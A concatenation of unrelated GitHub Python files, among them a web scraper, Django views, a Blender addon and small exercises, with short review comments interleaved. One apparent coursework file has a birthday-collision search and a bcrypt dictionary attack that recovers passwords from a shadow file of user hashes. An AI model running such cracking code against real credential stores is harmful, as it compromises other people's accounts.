if fi == None:\n print(\"Could not open csv file: \", file_name)\n return None\n \n file_name_result = \"result_after_scraping.csv\"\n fo = open(file_name_result, \"w+\") # r stands for write over\n if fo == None:\n print(\"Could not create csv file: \", file_name_result)\n return None\n\n # copy over the header\n ln = fi.readline()\n fo.write(ln)\n\n while True:\n parsed_line = line_from_csv(fi)\n if parsed_line == None: # reached the last line of the csv\n break\n if len(parsed_line) < 1:\n fo.write(\"\\r\\n\")\n continue\n brand = parsed_line[0]\n url = parsed_line[1]\n annual_sales = get_annual_sales(url)\n parsed_line[3] = annual_sales\n alexa_rating = get_alexa_rating(url)\n parsed_line[4] = alexa_rating\n num_employees = get_num_employees(brand)\n parsed_line[5] = num_employees\n\n if parsed_line[6] == '': # don't overwrite a size that is already present in the csv\n if annual_sales != 'URL Failed':\n annual_sales = float(annual_sales)\n if annual_sales <= 10000000: # small <= 10m\n parsed_line[6] = 'Small'\n if annual_sales >= 100000000: # large >= 100m\n parsed_line[6] = 'Large'\n else: # medium is between small and large\n parsed_line[6] = 'Medium'\n elif num_employees != 'Brand Failed':\n num_employees = float(num_employees)\n if num_employees <= 10: # small <= 10\n parsed_line[6] = 'Small'\n if num_employees >= 100: # large >= 100\n parsed_line[6] = 'Large'\n else: # medium is between small and large\n parsed_line[6] = 'Medium'\n else:\n parsed_line[6] = '?Small' # set to ?Small if unable to parse info on the brand\n\n if parsed_line:\n line = \"\"\n for l in parsed_line:\n line = line + l + \",\"\n line = line[0:len(line)-1]\n fo.write(line)\n fo.write(\"\\r\\n\")\n else:\n print(\"No data scraped\")\n fi.close()\n fo.close()\n\ndef save_scraped_data(lines):\n if lines:\n file_name = \"result_after_scraping.csv\"\n f = open(file_name,\"w+\")\n f.write(\"Brand name\", \"Brand URL\", \"Shopify or other\",\"Annual sales\", \"Alexa rating\", \"# of employees,Segment (s/m/l/d)\", \"Name/Founder 1,Contact 
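# A note on line_from_csv in slow_size_scraper.py above: the hand-rolled comma
# splitter appears to drop the final field of any line without a trailing comma
# (the `if i < len(ln)` guard skips the append at end-of-line), and it cannot handle
# quoted fields that contain commas. The standard library covers both cases; a small
# sketch (the path argument is illustrative):
import csv

def rows_from_csv(path):
    with open(path, newline="") as fh:
        reader = csv.reader(fh)
        next(reader)  # skip the header row, as process_file does
        yield from reader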
email\"\"\\r\\n\")\n for line in lines:\n f.write(line + \"\\r\\n\")\n f.close() \n else:\n print(\"No data scraped\")\n return\n\n# main code entry point\nif __name__==\"__main__\":\n multiprocessing.freeze_support()\n argparser = argparse.ArgumentParser()\n argparser.add_argument('path',help = 'Path to CSV')\n argparser.add_argument('start',help = 'Starting line in CSV') # includes starting line\n argparser.add_argument('end',help = 'Ending line in CSV') # includes ending line\n args = argparser.parse_args()\n file_path = args.path\n start = args.start\n end = args.end\n print(\">> \", file_path)\n process_file(file_path)\n # done\n\n# helper methods below - annual sales, alexa rating, number of employees\ndef get_annual_sales(url): \n url = 'https://ecommercedb.com/en/store/{0}'.format(url)\n headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'}\n failed = False\n\n # Retries 5 times for handling network errors\n for _ in range(2):\n print (\"Retrieving %s\"%(url)) \n response = requests.get(url, headers=headers, verify=True)\n parser = html.fromstring(response.text)\n print(\"Done retrieving - status code: \", response.status_code)\n\n if response.status_code!=200:\n failed = True\n continue\n else:\n failed = False\n break\n\n if failed:\n print(\"The ecommercedb.com network is unresponsive or url error. Please try again later (or now).\")\n return \"URL Failed\"\n\n raw_value = parser.xpath('//div[contains(@class, \"fancyBox__content\")]//text()')\n value = raw_value[0].strip()\n if value[len(value) - 1] == 'm':\n magnitude = 1000000\n else:\n magnitude = 1\n number_value = value[3: len(value) - 1]\n price = Price.fromstring(number_value).amount_float\n price = price * magnitude\n price = str(price)\n return price\n\ndef get_alexa_rating(url): \n url = 'https://www.alexa.com/siteinfo/{0}'.format(url)\n headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'}\n failed = False\n\n # Retries 5 times for handling network errors\n for _ in range(2):\n print (\"Retrieving %s\"%(url)) \n response = requests.get(url, headers=headers, verify=True)\n parser = html.fromstring(response.text)\n print(\"Done retrieving - status code: \", response.status_code)\n\n if response.status_code!=200:\n failed = True\n continue\n else:\n failed = False\n break\n\n if failed:\n print(\"The alexa.com network is unresponsive or url error. 
Please try again later (or now).\")\n return \"URL Failed\"\n\n raw_value = parser.xpath('//div[contains(@class, \"rankmini-rank\")]//text()') # some sites use rankmini-rank\n if len(raw_value) < 1:\n raw_value = parser.xpath('//p[contains(@class, \"big data\")]//text()') # some sites use big data\n if len(raw_value) < 1:\n return \"URL Failed\"\n value = raw_value[2].strip()\n ranking = ''.join([c for c in value if c in '1234567890'])\n return str(ranking)\n\ndef get_num_employees(brand): \n url = 'https://www.google.com/search?q={0} number of employees'.format(brand)\n headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'}\n failed = False\n\n # Retries 5 times for handling network errors\n for _ in range(2):\n print (\"Retrieving %s\"%(url)) \n response = requests.get(url, headers=headers, verify=True)\n parser = html.fromstring(response.text)\n print(\"Done retrieving - status code: \", response.status_code)\n\n if response.status_code!=200:\n failed = True\n continue\n else:\n failed = False\n break\n\n if failed:\n print(\"The google.com network is unresponsive or url error. Please try again later (or now).\")\n return \"Brand Failed\"\n\n raw_value = parser.xpath('//div[contains(@class, \"Z0LcW XcVN5d AZCkJd\")]//text()')\n if len(raw_value) < 1:\n return \"Brand Failed\"\n value = raw_value[0].strip()\n num_employees = ''.join([c for c in value if c in '1234567890'])\n return str(num_employees)","repo_name":"jenaalsup/scrape_brand_stats","sub_path":"slow_size_scraper.py","file_name":"slow_size_scraper.py","file_ext":"py","file_size_in_byte":7150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"16367831315","text":"from Crypto.Hash import SHA256\nimport random, string\nimport datetime\nfrom bcrypt import *\nfrom nltk.corpus import words\n\ndef hashArbitraryInput(input):\n bytesInput = str.encode(input) # converts string input into bytes\n h = SHA256.new()\n h.update(bytesInput)\n return h.hexdigest()\n\ndef modifyDigest(digestValue, modVal, length):\n modVal = int(modVal, 16)\n finalBits = \"\"\n for val in digestValue:\n fourBitValue = '{:04b}'.format(int(val, 16))\n finalBits += fourBitValue\n finalBits = int(finalBits, 2)\n binaryAfterMod = bin(finalBits % modVal).replace(\"0b\",\"\").zfill(length)\n return binaryAfterMod\n\ndef generateMessage():\n res = ''.join(random.choices(string.ascii_letters, k = 16))\n return res\n\ndef findCollision(modVal, length):\n myDict = {}\n while(True):\n someInput = generateMessage()\n truncatedDigest = modifyDigest(hashArbitraryInput(someInput), modVal, length)\n if truncatedDigest in myDict:\n return myDict[truncatedDigest], truncatedDigest, someInput, len(myDict.keys())\n else:\n myDict[truncatedDigest] = someInput\n continue\n\ndef readFile(fileName):\n f = open(fileName, \"r\")\n content = f.read()\n listOfUsers = content.splitlines()\n f.close()\n return listOfUsers \n\ndef gatherInfo(userInfo):\n info = userInfo.split(\":\")\n username = info[0]\n saltHash = info[1]\n salt = \"\"\n for i in range(len(saltHash)):\n if i == 29:\n break;\n else:\n salt += saltHash[i]\n return username, salt, saltHash\n\ndef findPassword(salt, saltHash, listOfWords):\n bSalt = salt.encode()\n for word in listOfWords:\n bWord = word.encode()\n myOutput = hashpw(bWord, bSalt)\n testVal = myOutput.decode()\n if testVal == saltHash:\n return word\n else:\n continue\n print(\"No password found!\")\n\n\n\ndef main():\n 
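# findCollision above is a birthday attack on a digest reduced (via the modulus) to
# `length` bits: for an n-bit output, the first collision is expected after roughly
# sqrt(pi/2 * 2**n) random hashes, which is why the timing loop in main() slows down
# so quickly as the bit width grows. A quick check of that estimate:
import math

for n_bits in (8, 16, 24, 32):
    expected = math.sqrt(math.pi / 2 * 2 ** n_bits)
    print(f"{n_bits}-bit digest: ~{expected:,.0f} hashes per collision")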
print(hashArbitraryInput(\"hello\"))\n print(hashArbitraryInput(\"iello\")) # iello has hamming distance of 1 bit with hello\n\n # print(hashArbitraryInput(\"a\"))\n # print(hashArbitraryInput(\"b\")) # a has hamming distance of 1 bit with b\n\n # print(hashArbitraryInput(\"BOB\"))\n # print(hashArbitraryInput(\"BOA\")) # BOB has hamming distance of 1 bit with BOA\n\n # hexString = 'ff'\n # addedVal = '3'\n # for i in range(8, 52, 2):\n # if i % 4 != 0:\n # hexString = addedVal + hexString\n # if i % 4 == 0 and i != 8:\n # hexString = hexString.replace(\"3\", \"f\", 1)\n # print(\"Num of bits are: \", i)\n # start_time = datetime.datetime.now()\n # print(findCollision(hexString, i))\n # end_time = datetime.datetime.now()\n # print(\"Time elapsed: \", end_time - start_time)\n # print(\"----\")\n\n # listOfUsers = readFile(\"shadow.txt\")\n # listOfWords = words.words()\n # newListOfWords = []\n # for word in listOfWords:\n # if len(word) >= 6 and len(word) <= 10:\n # newListOfWords.append(word)\n # for i in range(len(listOfUsers)):\n # username, salt, saltHash = gatherInfo(listOfUsers[i])\n # start_time = datetime.datetime.now()\n # password = findPassword(salt, saltHash, newListOfWords)\n # print(username, password, salt)\n # end_time = datetime.datetime.now()\n # print(\"Time elapsed: \", end_time - start_time)\n\n\nif __name__ == '__main__':\n main()\n ","repo_name":"Bharath-Joe/hashing_and_passwords","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39218146753","text":"import pika\nfrom django.conf import settings\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom nothotdog.photos.models import Photo\n\n\n@receiver(post_save, sender=Photo)\ndef upload_handler(sender, instance, created, **kwargs):\n # Do nothing if there was no new upload.\n if created:\n bytes_data = (instance.id).to_bytes(2, byteorder='big')\n send_photo_alert(bytes_data)\n\n\ndef send_photo_alert(message):\n connection = pika.BlockingConnection(\n pika.ConnectionParameters(host=settings.RABBITMQ_HOST)\n )\n channel = connection.channel()\n\n channel.queue_declare(queue='hotdog_alert')\n channel.basic_publish(\n exchange='',\n routing_key='hotdog_alert',\n body=message,\n properties=pika.BasicProperties(\n delivery_mode=2, # Make message persistent.\n )\n )\n connection.close()\n","repo_name":"jesper-trell/trell-hell","sub_path":"project2/nothotdog/nothotdog/photos/signals/upload_handler.py","file_name":"upload_handler.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"10278096486","text":"#!/usr/bin/env python\n# encoding=utf-8\n# maintainer: rgaudin\n\nfrom django import forms\nfrom django.contrib import messages\nfrom django.shortcuts import render, redirect\nfrom django.utils.translation import ugettext as _, ugettext_lazy\nfrom django.conf import settings\n\nfrom nosmsd.models import Inbox, SentItems\nfrom bolibana.web.decorators import provider_required\nfrom bolibana.tools.utils import send_email\nfrom pnlp_core.models import MalariaReport\nfrom pnlp_core.data import current_reporting_period, contact_for\n\n\ndef nb_reports_for(entity, period):\n nb_rec = MalariaReport.objects.filter(entity__parent=entity,\n period=period).count()\n next_period = period.next()\n if entity.type.slug == 'district':\n nb_ent = 
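# upload_handler above publishes the two-byte photo id to the 'hotdog_alert' queue
# with delivery_mode=2 (persistent messages). For reference, a minimal pika consumer
# for the other end of that queue; the host and the callback body are assumptions,
# not code from this repo:
import pika

def on_alert(channel, method, properties, body):
    photo_id = int.from_bytes(body, byteorder='big')  # mirrors the producer's to_bytes
    print(f"photo {photo_id} uploaded")

connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = connection.channel()
channel.queue_declare(queue='hotdog_alert')
channel.basic_consume(queue='hotdog_alert', on_message_callback=on_alert, auto_ack=True)
channel.start_consuming()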
entity.get_children().count()\n incoming_sms = None\n all_sms = None\n else:\n nb_ent = 1\n number = contact_for(entity, True).phone_number\n if not number is None and number.startswith('+223'):\n number = '+223' + number\n incoming_sms = Inbox.objects.filter(receivingdatetime__gte=next_period.start_on,\n receivingdatetime__lte=next_period.end_on,\n sendernumber=number)\n sent_sms = SentItems.objects.filter(sendingdatetime__gte=next_period.start_on,\n sendingdatetime__lte=next_period.end_on,\n destinationnumber=number)\n if incoming_sms.count() != sent_sms.count():\n all_sms = list(incoming_sms) + list(sent_sms)\n else:\n all_sms = sent_sms\n\n percent = float(nb_rec) / nb_ent\n return {'entity': entity, 'nb_received': nb_rec,\n 'nb_expected': nb_ent,\n 'received_rate': percent,\n 'incoming_sms': incoming_sms,\n 'all_sms': all_sms}\n\n\ndef contact_choices(contacts):\n \"\"\" returns (a[0], a[1] for a in a list \"\"\"\n # SUPPORT_CONTACTS contains slug, name, email\n # we need only slug, name for contact form.\n return [(slug, name) for slug, name, email in settings.SUPPORT_CONTACTS]\n\n\nclass ContactForm(forms.Form):\n \"\"\" Simple contact form with recipient choice \"\"\"\n\n name = forms.CharField(max_length=50, required=True, \\\n label=ugettext_lazy(u\"Your Name\"))\n email = forms.EmailField(required=False, \\\n label=ugettext_lazy(u\"Your e-mail address\"))\n phone_number = forms.CharField(max_length=12, required=False, \\\n label=ugettext_lazy(u\"Your phone number\"))\n subject = forms.CharField(max_length=50, required=False, \\\n label=ugettext_lazy(u\"Subject\"))\n\n recipient = forms.ChoiceField(required=False, \\\n label=ugettext_lazy(u\"Recipient\"), \\\n choices=contact_choices(settings.SUPPORT_CONTACTS), \\\n help_text=_(u\"Choose PNLP for operational \" \\\n u\"requests and ANTIM for \" \\\n u\"technical ones.\"))\n\n message = forms.CharField(required=True, \\\n label=ugettext_lazy(u\"Your request\"), \\\n widget=forms.Textarea)\n\n\ndef contact(request):\n category = 'contact'\n context = {'category': category}\n\n try:\n web_provider = request.user.get_profile()\n except:\n web_provider = None\n\n if request.method == 'POST':\n form = ContactForm(request.POST)\n\n if form.is_valid():\n try:\n dest_mail = [email for s, n, email \\\n in settings.SUPPORT_CONTACTS \\\n if s == 'pnlp'][0]\n except:\n dest_mail = []\n\n mail_cont = {'provider': web_provider, \\\n 'name': form.cleaned_data.get('name'),\n 'email': form.cleaned_data.get('email'),\n 'phone_number': form.cleaned_data.get('phone_number'),\n 'subject': form.cleaned_data.get('subject'),\n 'message': form.cleaned_data.get('message')}\n\n sent, sent_message = send_email(recipients=dest_mail, \\\n context=mail_cont,\n template='emails/support_request.txt', \\\n title_template='emails/title.support_request.txt')\n if sent:\n messages.success(request, _(u\"Support request sent.\"))\n return redirect('support')\n else:\n messages.error(request, _(u\"Unable to send request. 
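# Likely bug in nb_reports_for above: `if not number is None and
# number.startswith('+223')` prepends the Mali country code exactly when it is
# already present, producing '+223+223...'. The intended normalisation is almost
# certainly the negated check; a sketch, written with `is not None` per PEP 8:
def normalize_msisdn(number):
    if number is not None and not number.startswith('+223'):
        number = '+223' + number
    return number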
Please \" \\\n \"try again later.\"))\n\n if request.method == 'GET':\n if web_provider:\n initial_data = {'name': web_provider.name_access, \\\n 'email': web_provider.email, \\\n 'phone_number': web_provider.phone_number}\n else:\n initial_data = {}\n\n form = ContactForm(initial=initial_data)\n\n context.update({'form': form})\n\n return render(request, 'contact.html', context)\n\n\n@provider_required\ndef dashboard(request):\n category = 'dashboard'\n context = {'category': category}\n\n from bolibana.models import Entity\n from pnlp_core.data import (current_period, current_stage, \\\n time_cscom_over, time_district_over, \\\n time_region_over)\n\n def sms_received_sent_by_period(period):\n received = Inbox.objects.filter(receivingdatetime__gte=period.start_on,\n receivingdatetime__lte=period.end_on) \\\n .count()\n sent = SentItems.objects.filter(sendingdatetime__gte=period.start_on,\n sendingdatetime__lte=period.end_on) \\\n .count()\n return (received, sent)\n\n def received_reports(period, type_):\n return MalariaReport.objects.filter(period=period, \\\n entity__type__slug=type_)\n\n def reports_validated(period, type_):\n return MalariaReport.validated.filter(period=period, \\\n entity__type__slug=type_)\n\n def reporting_rate(period, entity):\n return float(MalariaReport.validated.filter(period=period, \\\n entity__parent=entity).count()) \\\n / Entity.objects.filter(parent__slug=entity.slug).count()\n\n current_period = current_period()\n period = current_reporting_period()\n\n context.update({'current_period': current_period,\n 'current_reporting_period': period,\n 'current_stage': current_stage(),\n 'current_sms': sms_received_sent_by_period(current_period),\n 'current_reporting_sms': \\\n sms_received_sent_by_period(period),\n 'total_cscom': Entity.objects\\\n .filter(type__slug='cscom').count(),\n 'time_cscom_over': time_cscom_over(period),\n 'time_district_over': time_district_over(period),\n 'time_region_over': time_region_over(period)})\n\n received_cscom_reports = received_reports(period, 'cscom')\n cscom_reports_validated = reports_validated(period, 'cscom')\n district_reports_validated = reports_validated(period, 'district')\n reporting_rate = \\\n float(MalariaReport.validated.filter(period=period).count()) \\\n / Entity.objects.count()\n\n cscom_missed_report = \\\n Entity.objects.filter(type__slug='cscom')\\\n .exclude(id__in=[r.entity.id \\\n for r \\\n in received_cscom_reports])\\\n .order_by('name')\n\n def entities_autoreports(level):\n districts_missed_report = {}\n auto_validated_cscom_reports = \\\n MalariaReport.validated\\\n .filter(entity__type__slug=level, \\\n modified_by__user__username='autobot')\n for report in auto_validated_cscom_reports:\n if not report.entity.parent.slug in districts_missed_report:\n districts_missed_report[report.entity.parent.slug] = \\\n {'entity': report.entity.parent, \\\n 'nbauto': 0, \\\n 'contact': contact_for(report.entity.parent, False)}\n districts_missed_report[report.entity.parent.slug]['nbauto'] += 1\n return districts_missed_report\n\n districts_missed_report = entities_autoreports('cscom')\n regions_missed_report = entities_autoreports('district')\n\n context.update({'received_cscom_reports': received_cscom_reports.count(),\n 'cscom_reports_validated': cscom_reports_validated.count(),\n 'district_reports_validated': district_reports_validated.count(),\n 'reporting_rate': reporting_rate,\n 'cscom_missed_report_count': cscom_missed_report.count(),\n 'cscom_missed_report': [(e, contact_for(e, True)) \\\n for e in 
cscom_missed_report[:20]],\n 'districts_missed_report': districts_missed_report,\n 'regions_missed_report': regions_missed_report})\n\n return render(request, 'dashboard.html', context)\n\n\nclass DateForm(forms.Form):\n import datetime\n date = forms.DateField(initial=datetime.date.today)\n\n\ndef change_date(request):\n\n context = {}\n\n if request.method == 'POST':\n form = DateForm(request.POST)\n if form.is_valid():\n import subprocess\n subprocess.call(['sudo', 'date', form.cleaned_data.get('date') \\\n .strftime('%m%d1200%Y')])\n context.update({'success': True})\n else:\n pass\n else:\n form = DateForm()\n\n context.update({'form': form})\n\n return render(request, 'date.html', context)\n","repo_name":"yeleman/pnlp2011","sub_path":"pnlp_web/views/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":10295,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"22598713439","text":"# Write a Python program to convert seconds to day, hour, minutes and seconds.\ntime = float(input(\"Input time in seconds: \"))\nday = time // 86400\ntime = time % 86400\nhour = time //3600\ntime = time % 3600\nminute = time //60\ntime =time % 60\nsecond = time\n\nprint(f'Days = {day} Hour = {hour} Minutes = {minute} Second = {second}')","repo_name":"prajwal60/ListQuestions","sub_path":"learning/BasicQuestions/Qsn65.py","file_name":"Qsn65.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18699571792","text":"import flask\nfrom flask import Flask, render_template, request\nimport json\nfrom transliterate.base import TranslitLanguagePack, registry\nfrom transliterate import get_available_language_codes, translit, get_translit_function\nfrom transliterate.discover import autodiscover\nimport nltk\nimport language_tool_python as ltp\nfrom pymorphy2 import MorphAnalyzer\nfrom KDTree import KDTree\n\n\n\nclass KBDLanguagePack(TranslitLanguagePack):\n language_code = \"kbd\"\n language_name = \"KeyBoard\"\n mapping = (\n 'QWERTYUIOP{}ASDFGHJKL:\"ZXCVBNM<>?qwertyuiop[]asdfghjkl;\\'zxcvbnm,./',\n 'ЙЦУКЕНГШЩЗХЪФЫВАПРОЛДЖЭЯЧСМИТЬБЮ,йцукенгшщзхъфывапролджэячсмитьбю.',\n )\n\n\n\nautodiscover()\nregistry.register(KBDLanguagePack)\n\ntranslit_ru = get_translit_function('ru')\ntranslit_kbd = get_translit_function('kbd')\n\ntool_en = ltp.LanguageTool('en-US')\ntool_ru = ltp.LanguageTool('ru-RU')\n\n\ndef normalize_text(src: str):\n src_str = src\n kbd_str_ru = translit_kbd(src)\n kbd_str_en = translit_kbd(src, reversed=True)\n str_ru = translit_ru(src)\n str_en = translit_ru(src, reversed=True)\n translits = [src_str, kbd_str_ru, kbd_str_en, str_ru, str_en]\n correct_ru = list(map(lambda x: tool_ru.correct(x), translits))\n correct_en = list(map(lambda x: tool_en.correct(x), translits))\n return [*correct_ru, *correct_en]\n\n\napp = Flask(__name__,\n static_url_path='', \n static_folder='static',\n template_folder='templates')\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n\n@app.route('/search', methods=['POST'])\ndef query_example():\n text = request.get_data(as_text=True)\n # print(text)\n # normed_text = normalize_text(text)\n requestt = tool_ru.correct(text.lower())\n print(requestt)\n data = [{'':item} for item in enumerate(KDTree.find(requestt).to_list())]\n return json.dumps(data, ensure_ascii=False)\n\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', 
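# The floor-divide/modulo ladder in Qsn65.py above is what divmod() exists for; it
# also keeps every intermediate an int rather than the floats the original prints.
# An equivalent sketch:
total = int(input("Input time in seconds: "))
days, rest = divmod(total, 86400)
hours, rest = divmod(rest, 3600)
minutes, seconds = divmod(rest, 60)
print(f"Days = {days} Hour = {hours} Minutes = {minutes} Second = {seconds}")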
debug=True)","repo_name":"mikkon2409/tenderhack-2022","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"75000720224","text":"import random\n\n# $$$$$ SOLLUTION 1 $$$$$\n# class GuessingGame():\n# def __init__(self, answer_number):\n# self.answer_number = answer_number\n# self.solved = False\n\n# def guess(self, user_guess):\n# if user_guess > self.answer_number:\n# return 'High'\n# elif user_guess < self.answer_number:\n# # print('low')\n# return 'Low'\n# else:\n# self.solved = True\n# return 'Correct'\n \n# def solved(self):\n# return self.solved\n\n# game = GuessingGame(10)\n# print(game.guess(1))\n# print(game.solved)\n\n# $$$$$ SOLLUTION 2 $$$$$\n\nclass GuessingGame():\n def __init__(self, answer_number):\n self.answer_number = answer_number\n self.solved = False\n\n def guess(self, last_guess):\n if last_guess > self.answer_number:\n return 'High'\n elif last_guess < self.answer_number:\n return 'Low'\n else:\n self.solved = True\n return 'Correct'\n \n def solved(self):\n return self.solved\n\n\n# ----- main.py -----\ngame = GuessingGame(random.randint(1,100))\nlast_guess = None\nlast_result = None\n\nwhile game.solved == False:\n if last_guess != None: \n print(f\"Oops! Your last guess ({last_guess}) was {last_result}.\")\n print(\"\")\n\n last_guess = int(input(\"Enter your guess: \")) \n last_result = game.guess(last_guess)\n\n\nprint(f\"{last_guess} was correct!\")","repo_name":"robertuptc/oop-guessing-game-2023","sub_path":"guessing_game.py","file_name":"guessing_game.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24049266197","text":"from Constant import Constant\n\n\nclass Ball:\n \"\"\"A class for keeping info about the balls\"\"\"\n def __init__(self, ball):\n self.x = ball[2]\n self.y = Constant.Y_MAX - ball[3]\n self.radius = ball[4]\n self.color = '#ff8c00' # Hardcoded orange\n","repo_name":"dimitrisnikolaou10/nba_shot_probability_sportvu","sub_path":"animate/Ball.py","file_name":"Ball.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"29402939168","text":"bl_info = {\n \"name\": \"Lightsheet\",\n \"author\": \"Markus Ebke\",\n \"version\": (1, 2),\n \"blender\": (3, 2, 0),\n \"location\": \"View3D > Sidebar > Lightsheet Tab\",\n \"description\": \"Create fake caustics renderable in Cycles and EEVEE\",\n \"warning\": \"\",\n \"doc_url\": \"https://blenderartists.org/t/lightsheet-caustics-for-cycles-and-eevee/1292193\",\n \"tracker_url\": \"https://github.com/markus-ebke/Blender-Lightsheet/issues\",\n \"category\": \"Lighting\",\n}\n\n# support reloading scripts and addons\nif \"bpy\" in locals():\n import importlib\n\n importlib.reload(create_lightsheet)\n importlib.reload(trace_lightsheet)\n importlib.reload(refine_caustic)\n importlib.reload(finalize_caustic)\n importlib.reload(visualize_raypath)\n importlib.reload(animated_trace)\n importlib.reload(properties)\n importlib.reload(ui)\n\n print(\"Lighsheet: Addon reloaded\")\nelse:\n from lightsheet import (create_lightsheet,\n trace_lightsheet,\n refine_caustic,\n finalize_caustic,\n visualize_raypath,\n animated_trace,\n properties,\n ui)\n\n print(\"Lightsheet: Addon loaded\")\n\nimport bpy\nfrom bpy.utils import register_class, unregister_class\n\n\n# 
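# The KBDLanguagePack in the tenderhack app.py above is a fixed character-for-
# character keyboard-layout remap (QWERTY to ЙЦУКЕН) rather than a phonetic
# transliteration, so the same table also works with str.translate from the
# standard library; a sketch using the identical mapping strings:
LATIN = 'QWERTYUIOP{}ASDFGHJKL:"ZXCVBNM<>?qwertyuiop[]asdfghjkl;\'zxcvbnm,./'
CYRILLIC = 'ЙЦУКЕНГШЩЗХЪФЫВАПРОЛДЖЭЯЧСМИТЬБЮ,йцукенгшщзхъфывапролджэячсмитьбю.'
TO_RU = str.maketrans(LATIN, CYRILLIC)

print('ghbdtn'.translate(TO_RU))  # prints 'привет'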
registration\nclasses = (\n create_lightsheet.LIGHTSHEET_OT_create_lightsheets,\n trace_lightsheet.LIGHTSHEET_OT_trace_lightsheets,\n refine_caustic.LIGHTSHEET_OT_refine_caustics,\n finalize_caustic.LIGHTSHEET_OT_finalize_caustics,\n visualize_raypath.LIGHTSHEET_OT_visualize_raypath,\n animated_trace.LIGHTSHEET_OT_animated_trace,\n properties.CausticPathLink,\n properties.CausticRefinementSetting,\n properties.CausticInfo,\n ui.LIGHTSHEET_PT_tools,\n ui.LIGHTSHEET_PT_object,\n ui.LIGHTSHEET_PT_caustic,\n ui.LIGHTSHEET_PT_raypath,\n)\n\n\ndef register():\n for cls in classes:\n register_class(cls)\n\n bpy.types.Object.caustic_info = bpy.props.PointerProperty(\n type=properties.CausticInfo)\n\n print(\"Lightsheet: Addon registered\")\n\n\ndef unregister():\n del bpy.types.Object.caustic_info\n\n for cls in reversed(classes):\n unregister_class(cls)\n\n print(\"Lightsheet: Addon unregistered\")\n\n\nif __name__ == \"__main__\":\n register()\n","repo_name":"markus-ebke/Blender-Lightsheet","sub_path":"lightsheet/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"7"} +{"seq_id":"45338055464","text":"import bpy\nfrom mathutils import Vector\n\nimport os.path as op\n\nfrom .LOOKUPS import DIFFUSE, MASKS, NORMAL, DIFFUSE2 # noqa pylint: disable=relative-beyond-top-level\nfrom ..ModelImporter.readers import read_material # noqa pylint: disable=relative-beyond-top-level\nfrom ..utils.io import realize_path # noqa pylint: disable=relative-beyond-top-level\n\n\ndef create_material_node(mat_path: str, local_root_directory: str):\n # Read the material data directly from the material MBIN\n mat_data = read_material(mat_path)\n if mat_data is None or mat_data == dict():\n # no texture data so just exit this function.\n return\n # create a new material\n mat_name = mat_data.pop('Name')\n mat = bpy.data.materials.new(name=mat_name)\n\n uniforms = mat_data['Uniforms']\n\n # Since we are using cycles we want to have node-based materials\n mat.use_nodes = True\n\n # Add some material settings:\n CastShadow = mat_data['CastShadow']\n if CastShadow:\n mat.shadow_method = 'OPAQUE'\n\n nodes = mat.node_tree.nodes\n links = mat.node_tree.links\n # clear any existing nodes just to be safe.\n nodes.clear()\n # Now add all the nodes we need.\n output_material = nodes.new(type='ShaderNodeOutputMaterial')\n output_material.location = (500, 0)\n principled_BSDF = nodes.new(type='ShaderNodeBsdfPrincipled')\n principled_BSDF.location = (200, 150)\n principled_BSDF.inputs['Roughness'].default_value = 1.0\n FRAGMENT_COLOUR0 = principled_BSDF.outputs['BSDF']\n\n # Set up some constants\n if 61 in mat_data['Flags']:\n kfAlphaThreshold = 0.1\n kfAlphaThresholdMax = 0.5\n elif 10 in mat_data['Flags']:\n kfAlphaThreshold = 0.45\n kfAlphaThresholdMax = 0.8\n else:\n kfAlphaThreshold = 0.0001\n\n if 0 not in mat_data['Flags']:\n rgb_input = nodes.new(type='ShaderNodeRGB')\n rgb_input.outputs[0].default_value[0] = uniforms['gMaterialColourVec4'][0] # noqa\n rgb_input.outputs[0].default_value[1] = uniforms['gMaterialColourVec4'][1] # noqa\n rgb_input.outputs[0].default_value[2] = uniforms['gMaterialColourVec4'][2] # noqa\n rgb_input.outputs[0].default_value[3] = uniforms['gMaterialColourVec4'][3] # noqa\n lColourVec4 = rgb_input.outputs['Color']\n\n # TODO: restructure all this to be as similar to the actual shaders as\n # possible\n\n # create the diffuse, mask and normal nodes and give them their images\n for 
